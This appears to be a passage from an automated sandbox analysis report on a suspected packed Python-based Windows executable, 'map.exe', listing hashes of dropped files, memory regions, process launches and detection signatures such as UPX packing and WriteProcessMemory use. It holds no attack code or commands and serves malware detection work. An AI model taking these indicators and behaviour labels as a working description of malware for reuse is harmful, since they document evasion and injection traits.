| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_decimal.pyd
| MD5 | e3fb8bf23d857b1eb860923ccc47baa5 |
| SHA1 | 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0 |
| SHA256 | 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3 |
| SHA512 | 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
C:\Users\Admin\AppData\Local\Temp\_MEI48482\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
memory/4088-54-0x00007FFE7EAC0000-0x00007FFE7EAED000-memory.dmp
memory/4088-56-0x00007FFE7F4D0000-0x00007FFE7F4E9000-memory.dmp
memory/4088-58-0x00007FFE7EA60000-0x00007FFE7EA83000-memory.dmp
memory/4088-60-0x00007FFE6E1F0000-0x00007FFE6E367000-memory.dmp
memory/4088-62-0x00007FFE7F030000-0x00007FFE7F049000-memory.dmp
memory/4088-64-0x00007FFE7F840000-0x00007FFE7F84D000-memory.dmp
memory/4088-66-0x00007FFE75220000-0x00007FFE75253000-memory.dmp
memory/4088-68-0x00007FFE6E370000-0x00007FFE6E959000-memory.dmp
memory/4088-69-0x00007FFE6E120000-0x00007FFE6E1ED000-memory.dmp
memory/4088-71-0x00007FFE7F260000-0x00007FFE7F283000-memory.dmp
memory/4088-73-0x00007FFE6D670000-0x00007FFE6DB90000-memory.dmp
memory/4088-74-0x000002C0FCE70000-0x000002C0FD390000-memory.dmp
memory/4088-76-0x00007FFE7EA40000-0x00007FFE7EA54000-memory.dmp
memory/4088-79-0x00007FFE7EFF0000-0x00007FFE7EFFD000-memory.dmp
memory/4088-82-0x00007FFE6DC90000-0x00007FFE6DDAC000-memory.dmp
memory/4088-81-0x00007FFE7EA60000-0x00007FFE7EA83000-memory.dmp
memory/4088-78-0x00007FFE7F4D0000-0x00007FFE7F4E9000-memory.dmp
memory/496-89-0x0000013985810000-0x0000013985832000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fhgdies.wgk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4088-116-0x00007FFE6DC90000-0x00007FFE6DDAC000-memory.dmp
memory/4088-113-0x00007FFE6D670000-0x00007FFE6DB90000-memory.dmp
memory/4088-112-0x00007FFE6E120000-0x00007FFE6E1ED000-memory.dmp
memory/4088-111-0x00007FFE75220000-0x00007FFE75253000-memory.dmp
memory/4088-109-0x00007FFE7F030000-0x00007FFE7F049000-memory.dmp
memory/4088-102-0x00007FFE6E370000-0x00007FFE6E959000-memory.dmp
memory/4088-108-0x00007FFE6E1F0000-0x00007FFE6E367000-memory.dmp
memory/4088-107-0x00007FFE7EA60000-0x00007FFE7EA83000-memory.dmp
memory/4088-106-0x00007FFE7F4D0000-0x00007FFE7F4E9000-memory.dmp
memory/4088-105-0x00007FFE7EAC0000-0x00007FFE7EAED000-memory.dmp
memory/4088-115-0x00007FFE7EFF0000-0x00007FFE7EFFD000-memory.dmp
memory/4088-114-0x00007FFE7EA40000-0x00007FFE7EA54000-memory.dmp
memory/4088-110-0x00007FFE7F840000-0x00007FFE7F84D000-memory.dmp
memory/4088-104-0x00007FFE7F850000-0x00007FFE7F85F000-memory.dmp
memory/4088-103-0x00007FFE7F260000-0x00007FFE7F283000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48482\blank.aes
| MD5 | 696eca923c18fb428334ad4d17838392 |
| SHA1 | 6f1d72bde229a3881e6b88a7140bdcc7b3d5a078 |
| SHA256 | de4c0ba87ce7550c02caaf49cbf13afdfaf0f2c423b747d0d1a821b9c1b3c0d6 |
| SHA512 | b8bb84fedb64f324bdbc0915f4e271f709db1d493666c2c85cd9b3e595cf819a84fb5751017959a0a1e4a980f96c91b0174554c9aca66472561afab21441e0cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win7-20240419-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1576 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe |
| PID 1576 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe |
| PID 1576 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe | C:\Users\Admin\AppData\Local\Temp\release\map\map.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\release\map\map.exe
"C:\Users\Admin\AppData\Local\Temp\release\map\map.exe"
C:\Users\Admin\AppData\Local\Temp\release\map\map.exe
"C:\Users\Admin\AppData\Local\Temp\release\map\map.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI15762\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/2668-23-0x000007FEF5F30000-0x000007FEF6519000-memory.dmp